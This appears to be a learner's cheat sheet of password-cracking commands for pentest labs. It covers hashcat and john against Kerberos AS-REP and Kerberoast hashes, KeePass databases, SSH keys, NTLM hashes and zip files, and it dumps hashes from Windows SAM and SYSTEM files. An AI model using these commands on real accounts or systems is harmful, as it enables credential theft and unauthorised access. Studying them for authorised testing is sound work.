ASREProastable
# Copy the hash found and saved it in hashes.asreproast and crack it using hashcat
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------Kerberoastable
# Copy the hash found and saved it in hashes.kerberoast and crack it using hashcat
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------Database.kdbx or any .kdbx files
keepass2john Database.kdbx > keepass.hash
mousepad keepass.hash ############ dont forget to remove the name before colon and just keep the hash so that it can be cracked
hashcat -m 13400 -a 0 ./keepass.hash /usr/share/wordlists/rockyou.txt
### after cracking the password. To open it, use the below command
keepass2 Database.kdbx # when you do this, it ll ask for password that is welcome1, use the password you cracked to open it
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
id_ecdsa ssh key
ssh2john id_ecdsa > ssh.hash
#### IMPORTANT #### When you print the ssh.hash it starts like this, id_ecdsa:$sshng$6$16$0ef9e445850d777e7da4..............., when executing the next commands, remember to remove the filename before colon and then execute.
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
sudo ssh -i id_ecdsa -p <port 22 or 2222> <username>@<ip>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ntlm hashes
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
SAM and SYSTEM files
python secretsdump.py -sam SAM -system SYSTEM LOCAL
samdump2 SYSTEM SAM # you can even use this to dump the hashes
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
# Cracking Zip files
zip2john 8702.zip > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt